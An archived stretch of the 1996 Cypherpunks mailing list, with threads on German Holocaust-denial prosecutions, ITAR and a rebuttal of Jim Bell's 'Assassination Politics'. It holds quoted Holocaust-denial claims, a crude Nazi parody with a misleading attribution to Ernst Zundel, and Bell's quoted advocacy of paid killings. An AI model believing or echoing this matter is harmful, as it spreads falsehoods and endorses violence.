status, so that he believes he cannot turn to his own security people and
confess - with the chance that he'll agree to become a double-agent, so
that the DOD can put disinformation into Soviet hands, and the FBI can
build up a dossier of admissable evidence against the foreign controller. 
Remember, you can't get your own guys out of the Russian Gulag unless
you've got a GRU man to trade for. 

One of the early stages is, being directed to steal a technical book from a 
library and deliver it to the controller.

Now do you see the signifigance of the Library Awareness Program?

When I worked in the Route 128 area (suburban Boston), we were briefed to
be especially suspicious about folks who would befriend us in local bars
after work and, for no identifiable reason, start giving us little tiny
favors; over time they would become real "angels"  that saved our asses
when we were having financial/marriage problems. The day might come when
they would start asking for "a little favor in return".  Something quite
innocuous. Then there would arrive a request that we hesitated to do, but
we knew we could get away with it without a problem.  Then a few weeks
later.... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 31 Jan 1996 00:19:41 +0800
To: cypherpunks@toad.com
Subject: Re: The Big Lie
In-Reply-To: <199601282156.NAA09063@netcom4.netcom.com>
Message-ID: <a3ZFiD78w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Zero crypto relevance...

mpd@netcom.com (Mike Duvos) writes:
> It is interesting to note that there is no specific law
> prohibiting free speech for Holocaust Agnostics in Germany. The
> actual laws under which such cases are prosecuted are libel laws,
> which have been liberally interpreted to mean that one may not
> "libel" deceased Jews as a class or their memory in the minds of
> their surviving relatives.
>
> The notion of libeling a class of deceased persons strikes me as
> a dangerous and particularly convoluted legal fiction. (Although
> I certainly don't mean any disrespect for the deceased or their
> survivors when I say this.)

To me this sounds like a very twisted legal reasoning. If I understood
correctly some other posts in this thread, by saying something like, "the Nazis
invaded Denmark for reasons other than to round up and kill the 3,000 Danish
Jews", this Zendel loser automatically implies that whoever says otherwise is
lying; and that is a libel/slander, and is a criminal (not just civil) offense.

I wonder if it should also be illegal in Germany to doubt the atrocities
perpetrated by various German factions on one another during the 30-Year War
(1618-1648), or during the peasant uprisings/religious wars of 16th century, or
on the Slavs during the conquest of Saxony in 11th century?

They were as brutal as WWII, and most modern Germans are probably the
descendants of the survivors, and neither Catholics nor Protestants like to
admit the nasty things done by their ancestors.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 29 Jan 1996 11:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: The Unintended Consequences of Suppression
In-Reply-To: <Pine.SV4.3.91.960128204852.12961B-100000@larry.infi.net>
Message-ID: <199601290252.UAA07231@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>     You just don't get it, do you?  Do-gooders like the Wiesenthalistas 
> don't need to be *right*; they need *a steady stream of cash contributions*

It's usually more effective to point out why what someone is saying is
wrong rather than to speculate as to what their motives for saying it
might be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 29 Jan 1996 10:21:54 +0800
To: cypherpunks@toad.com
Subject: Re: The Unintended Consequences of Suppression
In-Reply-To: <199601281959.LAA16755@netcom18.netcom.com>
Message-ID: <199601290153.UAA13081@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


an entity calling itself "Mike Duvos" writes:

[visit behind curtain at the now-crowded-and-popular Nazi web-parlor]

On my Beginnings of Freedom page, I've had links to some similar sites
for a while now:

http://www2.Gsu.EDU/~gs02jwb/LIST/MEDIA/media.ind
Banned Media and Organizations List

http://www2.Gsu.EDU/~gs02jwb/
The Coming Fall of the American Empire

I keep them around as examples of laughable assumptions that shrivel at
the slightest sign of daylight. If I don't keep an eye on folks who espouse
bad ideas, they're more likely to pose a threat to me at some point in the
future; I'd rather know exactly what they believe, and what they want, and
how they hope to accomplish it, the better to protect myself and possibly
work against them in some manner. (It'll probably get worse; I don't see
David Brin's vision in _Earth_ of "every man a spy/Boy Scout/Neighborhood
Watcher" as being that far-fetched. And that's the least possible evil.. :-S

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP 1/27/96. I don't know about you, but the only folks
I know who'd enjoy seeing someone in uniform on their porch are leathermen...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Tue, 30 Jan 1996 08:02:47 +0800
To: cypherpunks@toad.com
Subject: The Big Lie
Message-ID: <199601290354.UAA15417@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote (with some judicious editing):

, I took it as a fact that the
>so-called Holocaust actually happened. I saw pictures of death camps,
>interviews with survivors, etc.
>
> It seems more likely that
>the pictures were faked, 
>
>, I suspect the
>stories are true that the Holocaust was part of Truman's "Big Lie."
>

Good Lord!  We've all enjoyed Tim's rants, but this takes the biscuit.
What's next?
A denial of the athletic abilities of Negroes?

--Dave Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 29 Jan 1996 19:20:59 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: The Unintended Consequences of Suppression
In-Reply-To: <199601281959.LAA16755@netcom18.netcom.com>
Message-ID: <Pine.SV4.3.91.960128204852.12961B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> This goes beyond
> simple stupidity, and clearly approaches the lobotomy level of
> impaired mental functioning.


    You just don't get it, do you?  Do-gooders like the Wiesenthalistas 
don't need to be *right*; they need *a steady stream of cash contributions*

No one had ever heard of Farrakhan, until the ADL starting pumping out
press releases, attacking him by name. But Farrakhan was cleverer than
than Abe Foxman, who makes six figures as the head of ADL; Farrakhan used
the publicity to his financial advantage. Farrakhan now works the college
lecture circuit; even better, he hires sports arenas and fills them up
with lower-middle class blacks who are willing to pay the price of a
ticket, to see Whitey get sassed in public. 

"You can say anything you want about me, as long as you spell my name right".

It is a metric of AMerica's wealth, that we have a whole class of 
individuals who can make a living by being the interlocutors in political 
show biz. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tchen@mindport.net (Tom Chen)
Date: Mon, 29 Jan 1996 10:35:01 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <199601290215.VAA17075@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


can i get on the mailing list?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 30 Jan 1996 04:03:02 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601290519.VAA14243@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


The German prosecuters are currently targeting the site of Mr Zundel, "who
is well known for his open revisionist positions."


Zundel is not in fact a Nazi, but an anti nazi:  Here is a sample
of his work.

Bottom line.  German prosecuters are amazingly ignorant idiots.



Press Release                                        Date:  January 3,
1996
     
           Attention:  Assignment Editor / For immediate release

Hate all that you can hate in the Nazi Reserves!

In The Nazi Reserves, we hate more people before 6am, than most people
hate all day!

We promise if you join The Nazi Reserves, you will be trained in:

1) Marching
2) Re-learning History
3) Growing a mustache just like Hitler's
4) Burning your own house and blaming it on Jews!
5) Learning how to blame *everything* on Jews!
6) Learning how to blame everything that can't be blamed on Jews on the
Blacks!
7) Learning how to blame everything that can't be blamed on the Jews or
the Blacks on the Liberals!
8) Learning how to blame everything that can't be blamed on the Jews or
the Blacks or the Liberals on the Catholics!
9) How to signal the Alien Nazi UFO Mothership!
10) More marching!
11) How to enjoy being anal probed by Nazi aliens from space!
12) How to make your jackboots *really* shine!
13) How to beat up homosexuals (this one's easy-- just make sure you
outnumber them by about 6:1, and make sure you're in Colorado)
14) And yes, MORE marching!

If you join now, we promise you there will be *no volleyball* and *no
push-ups* and no *5 mile runs!*

Yes, even middle aged balding men can join the Nazi Reserves!

The Nazi Reserves:  It's not just a job, it's a perversion!

(Not like my other perversions which involve trying to stuff my plump legs
into stockings and prance around in heels.)

JOIN NOW AND WIN A FREE TRIP TO THE NAZI UFO BASE AT THE CENTER OF THE
EARTH!

Surveys show that 9 out of 10 prisons prefer candidates who have learned
the skills taught in The Nazi Reserves!  Join now and you increase your
chances of receiving free meals and housing for the rest of your life!




               -- Ernst Zundel

My right to free speech supersedes your right to exist.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 05:06:52 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: PAC_man
Message-ID: <m0tgm3x-0008xoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 1/28/96 -0500, John Young wrote:
>   1-28-96. TWP:

>   TWP has a followup on the AOL raid, mostly a police story
>   grisler on the cyber-prowling horny-cats. Has ICU of the
>   terminal logoff by a 13-year-old nerd. The fuz posted a
>   call-in for anon tips:
>
>      "You know how many we've gotten from our on-line hot
>      line? Not one. It's like they have this fantastic world
>      they operate in, and we are seen as intruders or
>      something."
>   ICU_ded

Maybe, they're catching on, huh?!?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 30 Jan 1996 04:04:47 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <199601282130.NAA29294@netcom6.netcom.com>
Message-ID: <199601290535.VAA08104@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com     

>>Zimmermann supports my contention, as I wrote in the post. NOTHING
>>happened to him. it is conceivable this same result could have
>>been arrived at (government drops investigation) if he never even 
>>hired a lawyer.
>>
>>Zimmermann is a perfect example of what may be counterproductive
>>hysteria on *our* side, toward advancing crypto. if Zimmermann
>>cannot be prosecuted, and is not prosecuted, where are the ITAR "teeth"???
>
>I am not a lawyer, but I suspect that the proscuters gave up because they
>could not build a trail of evidence between Zimmermann and the actual
>export.  After all, Zimmermann only wrote PGP.  He didn't post it on the
>net.

so what?!?!? what is your point?!?!?!

I am well aware of the Zimmermann
background!!! why do you think I used it as an example!!

the "Feds" are AWARE that KELLY GOEN was the one who distributed it.
did they prosecute him either? NO!!! did they have evidence that Goen
was the one that knowingly "exported" the code? PROBABLY!!! WHAT DOES
THIS TELL YOU?!?!?!

my point is that, what is anyone's evidence that what happened to 
Zimmermann (i.e. NOTHING WHATSOEVER other than an investigation that
ended with NOTHING) would not happen to whoever tried to "export"
whatever algorithms they pleased???

if people are going to pretend that the ITAR crypto sections have
TEETH, then please
give a disclaimer that YOU HAVE NO EVIDENCE. I have no problem with
people getting "paler shades of white" from all their imagined bogeymen.
I do have a problem with them complaining, then, about a reality
that came about from their own fears, i.e. was constructed BY THEM,
not by their opposition (i.e. the NSA).

Zimmermann SHOWS that any claim that the ITAR has "teeth" APPEARS TO
BE GROUNDLESS. what happened to Zimmermann? NOTHING. I repeat: he
could conceivably have NOT EVEN HIRED A LAWYER to achieve the current
situation, which was that he was NOT EVEN PROSECUTED, let alone
CONVICTED.

you can argue all you want about HYPOTHETICAL situations, but the
REALITY is that nobody has ever gotten any nastiness from any
ITAR-crypto prosecution. 

why is this point so hard to grasp???  perhaps whoever points out
various fears are groundless is barking up the wrong tree, if the
fearer is not interested in alternative scenarios or incapable of
conceiving of them.

if cpunks want excuses to cower in terror of the ITAR (such as e.g.
TCM seems to advocate), you will find endless  justification from
your rampant fantasies.  in my view, as I wrote, however, they are
about as substantial as fears of COOTIE or THE BOGEYMAN based on
actual reality.


P.S. it is well known that KELLY GOEN distributed the code-- you can
even ask Sternlout. I am not revealing any secret there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 05:17:46 +0800
To: cypherpunks@toad.com
Subject: Over-reacting?
Message-ID: <m0tgmJU-00091eC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:42 PM 1/28/96 -0800, Timothy C. May wrote:
>
>Folks,
>
>When people decide to copy other mailing lists on messages they send to
>Cypherpunks (or vice versa), we often get flooded with insults and spams
>from people who don't share our views. (While I have nothing against trying
>to recruit others to our views, in my opinion this is best done by
>judicious writing of essays for _them_, tuned to their interests, and not
>in mindless spamming of every list that might have a passing interest in
>some of the topics.)
>
>We already have enough traffic here, and don't need replies from a bunch of
>other lists, be they libertarian lists, digital commerce lists, human
>rights lists, or java lists.
>
>The latest example of this is the rantfest invvolving these players:

I really don't know why I'm being "killed" by May in this way.  He cites a 
rant by a local (Portland, Oregon) crackpot named "Jack Hammer."  I even 
took the time to apologize for his existence, while I do claim a certain 
lack of responsibility:  Basically, I'm being targeted because Hammer can't 
stand my essay.  (Whether May will even see my apology is in doubt, I 
suppose...)  While May certainly has the right to "killfile" whomever he 
wishes, it might be a bit more logical to do this in a graduated fashion, 
"killing" Hammer and then waiting to see if the rest of us follow in his 
habits.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Mon, 29 Jan 1996 06:18:28 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128115634.00977b14@panix.com>
Message-ID: <m0tgdui-0006DxC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "DCF" == Duncan Frissell <frissell@panix.com> writes:

DCF> At 12:07 AM 1/28/96 -0800, Timothy C. May wrote:
>> * the Germans recently arrested an American who landed in Germany
>> somewhere, as part of a trip. It seems he had been involved with
>> the production of Neo-Nazi material, somewhere out west. This was
>> the last I heard about the story. Sorry, I'm going from
>> carbon-based memory.
>> 

DCF> He was grabbed in Denmark and extradited to Germany so you'd have
DCF> to avoid most of the EU.

It's illegal in Germany to publish material denying the holocaust.  In
the same moment this guy sent his book (?) per snail-mail from Canada
to Germany he commited a crime here in Germany.

I don't think it's astonishing that Denmark imprissoned this guy and
transported him to Germany.  It's a normal thing that one country
imprisons a criminal another country is searching and the delivers
him/her to the country in question.


Have a nice day!

Olmur

- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMQvfbw9NARnYm1I1AQHZ2AP+P1wVnwXCZFakJXQGEroX8S+BdRIU304o
YDccXOC+rijZlAO8i8wuBL72M8WLEnXUQzCCKf+lvBJhR5qtQnpUZSQRgr/kedfs
6/cS/Y8BbwpjwPuzmFu+OtowgPM6b8GsSBNqrEOMnZ8oA3QacgYWj3RUoTSKJIJp
kLp2ovjYxfY=
=P9U7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Mon, 29 Jan 1996 06:20:41 +0800
To: Alan Pugh <ampugh@mci.newscorp.com>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <199601280459.XAA15779@kafka.delphi.com>
Message-ID: <m0tgdwj-0006DxC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Alan" Pugh <ampugh@mci.newscorp.com> writes:

[.....]
Alan> "The block - analogeous to the government ordering a bookstore
Alan> to take every book by a given publisher off the shelves because
Alan> it objected to one title - was imposed Thursday."

The difference is, that the German government was not ordering this
block.

Olmur

- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMQvf6g9NARnYm1I1AQEz3wP/dALeKMZM41WiElpwmKAhzHzWa3SQzMp8
bCXTD81EOgiVCftDlie1Fz0eMeQwmsGBVGMuSnNu2/dHDezlQK3FxG477x2WOxZD
STLQY8fHuDE4CLSjCxmHImXLCCyJA58GBKMBxVVf9lUfoBJjkSQed0/4UNHqSIau
/wXxrk7Kpp4=
=v3nt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Tue, 30 Jan 1996 08:08:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Escrowing Viewing and Reading Habits with the Government
Message-ID: <2.2.32.19960129025010.006a6adc@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:54 PM 1/27/96 -0800, you wrote:
>According to
>Director Freeh, "If we had had this program in place when Timothy McVeigh
>was a child, we could have detected his interest in ANFO and picked him up
>for reeducation, or at least recruited him for the CIA's Lockerbie team."
     ^^^^^^^^^^^

Please tell me this was not an actual quote.  The term re-education scares
me more than anything, as it's the term typically used by authoritarian
dictatorships for their tortures and murders.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 29 Jan 1996 11:23:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <ad316db21e021004a0ff@[205.199.118.202]>
Message-ID: <199601290252.VAA18010@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> As a point of information, the operators of the "Amateur Action" bulletin
> board in Fremont, California are now sitting in prison because they
> e-mailed material fully legal in California but illegal (the court
> determined) in Memphis, Tennessee.

Actually, it wasn't because of what they emailed, but rather the
owner/operators of AA BBS snail-mailed a video cassette that contained
"pornographic" materials.  Unfortunately it sets a bad precedent
nonetheless.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 29 Jan 1996 12:35:56 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <310c0c26.30666226@smtp.ix.netcom.com>
Message-ID: <HD5FiD82w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Very little crypto relevance in the following...

lull@acm.org (John Lull) writes:

> On Sun, 28 Jan 1996 21:41 +0100 (MET), Olmur wrote:
>
> > It's illegal in Germany to publish material denying the holocaust.  In
> > the same moment this guy sent his book (?) per snail-mail from Canada
> > to Germany he commited a crime here in Germany.
>
> How pray tell is a person in Canada supposed to know that?  I (in the
> US) certainly had no idea Germany had such a law.

Ignorance of the law is not a defense. How is a reasonable person supposed
to know that it's illegal to take >$10K in cash out of the country without
some paperwork? Yet one can be jailed for that. :-)

> Are you saying that, if I ran a bookstore, and accepted international
> mail orders, I would have to screen every order to ensure I did not
> ship something offensive to the German government?  And if I did fill
> such an order, and without ever having set foot in Germany, I could be
> arrested on my next trip to Europe, extradited to Germany, and
> imprisoned for doing something that is constitutionally protected in
> the US?

I recall that the former Soviet Union had a similar "long arm" interpretation
of its laws against anti-Soviet libel: if you ran a bookstore in the U.S. that
solds anti-Soviet materials and then came to visit the U.S.S.R., you could in
principle be arrested, tried, and convicted.

> Alternatively, what if I were to post to usenet a message denying the
> Holocaust, and one person in Germany retrieved that message.  Would I
> then be subject to arrest and extradition to Germany?

Certainly, if you posted an anti-Soviet article to Usenet from the U.S., and it
reached the former Soviet Union, you would be guilty of anti-Soviet libel.

> If this is really what Germany wants, then it sounds like time to
> totally cut Germany off from the internet, simply in self
> preservation.

I'm sure this is what the German government and many German people really want.
But, would you also argue that the former Soviet Union should not have been
allowed on Internet because some of the information that would enter it via the
internet would have been illegal there? I read that Singapore is similarly
trying to restrict its citizens' access to the net. I think it would be more
honorable to provide Germans with tools to access the information they want,
even it violates their laws that we consider to be unjust.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 30 Jan 1996 05:21:44 +0800
To: jim bell <cypherpunks@toad.com
Subject: [noise/rant] Re: Anonymous trashing of Jim Bell
Message-ID: <2.2.32.19960129062442.0091c5c0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


[Some people will object to this thread, and rightly so.  This is very off
topic.  I understand it is off topic.  But it needs to be said... If you
don't want to read this, hit 'n' or equivalent now. I also request that
responses to this be made in private e-mail and not to the entire list.]

[Also note that I stripped off the references to the Libertarian list and
the Democracy now list and avoided the urge to add the psychoceramics list.]

Jim, I used to take your postings at least semi-serious.  I ignored the ad
hominem as much as I could and tried to concentrate on the validity of the
arguments.  I had difficulty with many of your ideas, but I have that
problem with many people so it was not a big deal...

Then I met you at the Portland Cypherpunks meeting. You blew whatever
credibility that you had with me at that time.

At that meeting you made claims that were fantastic and beyond belief.  You
gave no evidence to support those claims, just relying on some sort of
future "proof".  (Sorry, but the burden of proof in these sort of cases lies
on the claimant, not the rest of the audience.) Assassination politics is
immensely credible compared to your plan to disable electronic equipment.
(And that is saying alot.)

Assassination politics suffers from a number of problems.  The biggest being
its difficulty in being implemented.  Such a system would suffer from
Federal agents posing as hit men, outright fraud, and attempts to destroy
the system from within and without.  I have seen nothing that makes me
believe it could ever be put into place.  I have yet to see you address any
of the flaws without resulting to flames and rant.

Unfortunately, you would rather attack your critics than deal with the flaws
in your beliefs.

The following is an example... 

At 08:30 PM 1/26/96 -0800, jim bell wrote:
>At 01:54 AM 1/27/96 +0100, Anonymous wrote:
>>Jim Bell writes:
>>
>>>While this would normally be my cue to offer up my "Assassination Politics"
>>>idea, which (if presumed to be correct) would stabilize "anarchy" and
>>>prevent "lawlessness and social disorder" (at least as normally seen by the
>>>average reader) I think that under the circumstances that would be redundant
>>>here.
>>
>>I'm not *sure* that your Assassination Politics trip is the worst piece of 
>>tripe I've ever seen on the list, but if it's not, it's right up there.
>
>I notice that you responded through an anonymous remailer, and didn't even 
>use a nym.  This is strange.  If anything, the people who criticize my idea 
>seem to be under the illusion that it is _I_ who should be embarrassed for 
>proposing it, and in fact vociferously promoting it.  "Those of you" who 
>object to it should be the ones who are "proudly" taking the "moral high 
>ground" and thus should be happy to identify yourself and defend your position.

There are reasons why an individual would do that.  Maybe they did not want
to create a nym just to respond to one message.  Maybe they thought that you
would recognize their other nyms. Maybe it is someone you know.  Whatever
the reason, it does not diminish their arguments.

>Even if, arguably, you invented the fiction that you feared for  your life 
>trying to argue with people like me, nothing prevents you from developing a 
>stable nym and arguing your position using it, secure in the knowledge that 
>your body is safe from attack.  Your arguments would still be subject to 
>sudden death, however.

You think very highly of your arguments, but have shown nothing that would
make me believe that you could actually do that without resorting to ad
hominem attacks.  In fact the poster brings up some interesting questions
which you totally ignore, due to your unwavering belief in your pet theory.
All you do is flame him, instead of dealing with the immense flaws in that
theory.

>>Those of us who are anarchists
>
>What?!?  You imply that you are an anarchist, yet you don't approve of a 
>system which might not only produce anarchy, but in fact in record time?  
>Well, EXCUUUUUUUUSE MEEEEEE!  Sorry to put you out of a "job."

Not all anarchists believe in killing others.  Sorry, but there are as many
variety of anarchy as there are anarchists.  As for the results of
"Assassination Politics", you have yet to show that it would produce any
results whatsoever, or if it is even possible to implement.  In fact, I
cannot see a way that it can be put into place without everyone involved
being put in jail.

>> are often that way because we think the *means* the State uses are evil, 
>>not to be excused by any amount of mumbo-jumbo.
>
>I think the state's ENDS are evil, too, not merely their MEANS.

Yet you never explain why it is valid to use evil to fight evil.  It is this
lack of willingness to discuss the details of your beliefs that make people
unwilling to take your ideas seriously.

>>  And you gleefully propose to let us *all* in on the immoral game of 
>>murdering those who annoy us sufficiently.
>
>Actually, if you followed my arguments carefully, you will notice that my 
>position is most accurately described by pointing out that I _could_not_ 
>keep you from participating in this "immoral game", even if I wanted to.

Or not participating...  Jim, if annoying people were a qualification for
murder, you would need to watch your back pretty damn carefully.  But it is
not a qualification yet...

You have yet to show, however, how your plan could ever be enacted.  If it
was possible to enact, you would probably be in jail for "conspiracy to
commit murder" or some similar charge.  Anyone who assisted in such a plan
would also risk such charges.  The feds are pretty ruthless in ferreting out
people who try an hire hitmen.  Especially from private citizens. the only
people who are able to hire hitmen and get away with it are the heavily
funded or the government themselves.  Setting up an organization to compete
with these groups will not be viewed favorably.

>For the record, I suspect some people who are total pacifists view the rest 
>of us, those willing use use violence to defend ourselves, as "immoral."

This is not as easily defendable as self-defense.  If you were shooting the
politico yourself, then I might agree.  But you are not.  You are hiring
someone else to do your dirty work for you.  If you were actually helping
out in the slaughter, then i might have a bit more respect for your
argument.  As it is though, I find it about as toothless as those who eat
meat, but are too squeamish to go hunting themselves.

>>I'll pass.
>
>Others won't.

The digestibility of your plan has little relevance to its possible adoption...

>>You know, if I were constructing an agent provacateur, I'd want a persona 
>>who's willing to be loudly clueless with ideas that show minimal or 
>>non-existent awareness of basic human hopes and fears, like security from 
>>random hit-squads.  I'd have him go on and on with his ideas, until 
>>eventually they can splashed all over headlines and used to discredit the 
>>whole realm of privacy protection.
>
>Aha!  You're implying (actually, implying is an understatement here) that I 
>am an "agent provocateur."  Naturally, it would be useless to deny this 
>(although, for the record, I will deny it), because anybody who was 
>convinced of its truth wouldn't expect me to tell the truth anyway.

Nope.  The poster is claiming that you are *TOO CLUELESS* to be an Agent
Provocateur.  You are missing the point.

>But hey, let's put it up for a vote.  How many people out there believe that 
>I am an "agent provocateur"?  C'mon people, don't be shy, you've seen my 
>prose.  What do the rest of you think?

I don't think you are any such thing.  I believe that you are convinced of
the rightness of your ideas and no amount of rational discourse will sway
you from that belief. Being a fanatic does not make you evil or an Agent
Provocateur.  It does make you less credible though...

>>But no, I don't think you're an agent.
>
>Good!  I'd hate to argue with a person who didn't realize I am SERIOUS.

You seem to miss the point that the poster was making, but no worry...

>>  More fool you, you're willing to do the government's disinformation work 
>>for it without even thirty pieces of silver or a 401K.
>
>To be perfectly honest, I did a lot of soul-searching in early 1995 about 
>whether I should publicize my ideas.  No, it wasn't because I was AFRAID 
>that it might happen.  I _WANTED_ it to happen.  Every little bit.  Every 
>government on the face of the earth, to come crashing down in a heap.  
>Complete, total, absolute anarchy.  (But not the "anarchy" that most people 
>are pre-programmed to think of...)  No more governments, no more borders, no 
>more taxes, no more holocausts, no more wars, no more politicians.  Forever 
>and ever and ever.  
>
>Rather, I was fearful that by publicizing the idea, I might end up 
>PREVENTING it from occurring.  You know, by giving the governments advance 
>warning about what was going to happen, I might actually help them prevent it.
>
>That worried me, a lot.  But eventually, I made my decision. After a huge 
>amount of thought that some day I might be inclined to relate.  However, if 
>I'd REALLY wanted to PREVENT this, I would have alerted the government 
>secretly, so that they could manipulate things behind the scenes, secretly, 
>to prevent this "crypto/digicash/internet anarchy."   _That_ I did not do.  
>I publicized it, allowed it to be criticized and therefore "perfected" (not 
>that it's "perfect, by any means!) it, and I'm now promoting it the best way 
>I know how.  And with all due modesty, it's getting a pretty good reception, 
>considering how extreme and drastic it initially might appear.
>
>Part of my reasoning was that unless I engaged in the absurd conceit of 
>believing that I was, cumulatively, smarter than everyone currently in the 
>government, I had no choice but to conclude that the government was already 
>aware of the potential problem.  And if that were the case, they were, at 
>that very moment, working desperately to PREVENT what I wanted, desperately, 
>to ACHIEVE.
>
>At that point, I made the choice of forcing the government's hand.

The above speaks for itself.  (I could say that this is one of the looniest
things I have read in a while, but I do take the Psychoceramics list...  It
is pretty high up there.)   It is definitely hard core crankdom of the
purest form.

If you were a threat to the Government, even a small one, you would have
been picked up and put away.  You seem to forget that this is an open
mailing list.  Many of the people who read this list are Government
employees.  (I am willing to bet that a sizable percentage work in some
variety of law enforcement.)  They know what you believe and what you are
agitating for.  But you are not a threat because you are not credible.  No
one is going to adopt your ideas because every time you open your mouth, you
make yourself look like a loon.  Not only do you make yourself look like a
loon, but every organization and group you associate with looks bad.

If you really desire to make your views accepted, you need to look at how
you present yourself to others.  Willingness to analyze your own belief
structures and refine them is a first step. Ability to take criticism is a
second step.  Without that, your ideas will be taken as the views of an
unwavering fanatic.  You will not sway many people with fanaticism.

>>At this point I recommend to you the 12-step program I explained to Vladimir.
>>
>>Signed,
>>A Friend
>
>Recommendation:  If you really want to be taken seriously, use your real 
>name or at the very least generate a stable nym.  Preferably, with messages 
>signed by the nym's public key.   Without it, you are a silly, unbelieveable 
>ass.  Even with it, you may STILL be a silly, unbelieveable ass, but at 
>least people would pay more attention to you.

I think that you have little to nothing to say about being taken seriously.

If you continue to go off on pseudo-science rants at meetings at the drop of
a hat, no one will take you serious there as well...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 30 Jan 1996 08:11:25 +0800
